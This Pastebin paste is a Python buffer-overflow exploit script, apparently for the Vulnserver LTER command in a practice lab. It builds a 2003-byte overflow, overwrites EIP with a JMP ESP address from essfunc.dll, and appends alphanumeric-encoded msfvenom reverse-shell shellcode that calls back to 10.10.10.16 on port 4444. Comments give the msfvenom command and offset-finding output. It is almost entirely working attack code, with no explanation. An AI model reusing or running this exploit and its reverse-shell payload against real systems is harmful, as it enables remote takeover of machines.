Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import socket
- import struct
- import sys
- host = sys.argv[1]
- port = int(sys.argv[2])
- # 62501203 in essfunc.dll
- jmp_esp = struct.pack("<I", 0x62501203)
- # msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.16 LPORT=4444 --arch x86 --platform windows bufferregister=esp -e x86/alpha_upper -f c
- # x86/alpha_upper chosen with final size 702
- shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
- "\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
- "\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
- "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
- "\x4c\x4b\x58\x4c\x42\x35\x50\x43\x30\x35\x50\x43\x50\x4d\x59"
- "\x4a\x45\x36\x51\x4f\x30\x52\x44\x4c\x4b\x30\x50\x46\x50\x4c"
- "\x4b\x50\x52\x44\x4c\x4c\x4b\x30\x52\x32\x34\x4c\x4b\x32\x52"
- "\x46\x48\x34\x4f\x48\x37\x31\x5a\x46\x46\x50\x31\x4b\x4f\x4e"
- "\x4c\x57\x4c\x55\x31\x53\x4c\x55\x52\x36\x4c\x37\x50\x4f\x31"
- "\x48\x4f\x44\x4d\x55\x51\x48\x47\x4d\x32\x4c\x32\x30\x52\x36"
- "\x37\x4c\x4b\x46\x32\x42\x30\x4c\x4b\x31\x5a\x57\x4c\x4c\x4b"
- "\x30\x4c\x44\x51\x53\x48\x5a\x43\x57\x38\x53\x31\x38\x51\x56"
- "\x31\x4c\x4b\x31\x49\x47\x50\x45\x51\x4e\x33\x4c\x4b\x50\x49"
- "\x32\x38\x4a\x43\x36\x5a\x57\x39\x4c\x4b\x37\x44\x4c\x4b\x35"
- "\x51\x4e\x36\x46\x51\x4b\x4f\x4e\x4c\x59\x51\x38\x4f\x44\x4d"
- "\x53\x31\x39\x57\x56\x58\x4b\x50\x34\x35\x4c\x36\x35\x53\x43"
- "\x4d\x5a\x58\x57\x4b\x33\x4d\x37\x54\x42\x55\x4b\x54\x50\x58"
- "\x4c\x4b\x30\x58\x31\x34\x45\x51\x59\x43\x35\x36\x4c\x4b\x44"
- "\x4c\x50\x4b\x4c\x4b\x30\x58\x45\x4c\x33\x31\x58\x53\x4c\x4b"
- "\x55\x54\x4c\x4b\x43\x31\x58\x50\x4c\x49\x57\x34\x36\x44\x51"
- "\x34\x31\x4b\x51\x4b\x35\x31\x31\x49\x51\x4a\x30\x51\x4b\x4f"
- "\x4d\x30\x51\x4f\x31\x4f\x50\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
- "\x4d\x51\x4d\x45\x38\x47\x43\x37\x42\x35\x50\x45\x50\x53\x58"
- "\x44\x37\x53\x43\x36\x52\x31\x4f\x36\x34\x45\x38\x50\x4c\x44"
- "\x37\x36\x46\x53\x37\x4b\x4f\x38\x55\x58\x38\x4a\x30\x53\x31"
- "\x35\x50\x35\x50\x36\x49\x4f\x34\x50\x54\x36\x30\x53\x58\x56"
- "\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f\x48\x55\x56\x30\x56\x30"
- "\x50\x50\x50\x50\x47\x30\x56\x30\x51\x50\x56\x30\x35\x38\x4b"
- "\x5a\x54\x4f\x49\x4f\x4b\x50\x4b\x4f\x49\x45\x5a\x37\x53\x5a"
- "\x33\x35\x33\x58\x54\x4a\x35\x5a\x54\x4a\x34\x50\x32\x48\x55"
- "\x52\x33\x30\x44\x51\x31\x4c\x4c\x49\x4d\x36\x42\x4a\x54\x50"
- "\x36\x36\x46\x37\x53\x58\x4c\x59\x4e\x45\x52\x54\x43\x51\x4b"
- "\x4f\x48\x55\x4d\x55\x59\x50\x54\x34\x44\x4c\x4b\x4f\x50\x4e"
- "\x44\x48\x43\x45\x4a\x4c\x35\x38\x4a\x50\x48\x35\x49\x32\x30"
- "\x56\x4b\x4f\x59\x45\x55\x38\x52\x43\x42\x4d\x53\x54\x43\x30"
- "\x4b\x39\x4b\x53\x36\x37\x36\x37\x50\x57\x46\x51\x5a\x56\x42"
- "\x4a\x52\x32\x30\x59\x46\x36\x5a\x42\x4b\x4d\x33\x56\x39\x57"
- "\x31\x54\x46\x44\x37\x4c\x35\x51\x55\x51\x4c\x4d\x57\x34\x31"
- "\x34\x54\x50\x58\x46\x43\x30\x57\x34\x50\x54\x46\x30\x36\x36"
- "\x56\x36\x36\x36\x37\x36\x50\x56\x30\x4e\x51\x46\x46\x36\x36"
- "\x33\x31\x46\x53\x58\x42\x59\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
- "\x38\x55\x4b\x39\x4d\x30\x50\x4e\x51\x46\x30\x46\x4b\x4f\x50"
- "\x30\x53\x58\x34\x48\x4b\x37\x55\x4d\x43\x50\x4b\x4f\x4e\x35"
- "\x4f\x4b\x4a\x50\x4f\x45\x4e\x42\x50\x56\x33\x58\x39\x36\x4d"
- "\x45\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x54\x46\x33\x4c"
- "\x35\x5a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x51"
- "\x57\x55\x43\x43\x42\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f"
- "\x49\x45\x41\x41")
- # Overflowed with lter.spk "LTER /.:/(3520 A's)"
- # Message= EIP contains normal pattern : 0x386f4337 (offset 2003)
- # \x00 & Uppercase Only
- nopsled = "\x43\x4B"*8
- buffer = "LTER /.:/"
- buffer += "A"*2003
- buffer += jmp_esp
- buffer += shellcode
- buffer += "C"*(3516-2003-len(jmp_esp)-len(shellcode))
- # root@kali:~/vulnserver/TRUN# msf-pattern_offset -q 386F4337
- # [*] Exact match at offset 2003
- # root@kali:~/vulnserver/TRUN# msf-pattern_offset -q 43396F43
- # [*] Exact match at offset 2007
- try:
- print "[+] Connecting to target"
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((host, port))
- s.recv(1024)
- print "[+] Sent payload with length: %d" % len(buffer)
- s.send(buffer)
- s.close()
- except:
- print "[-] Something went wrong :("
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement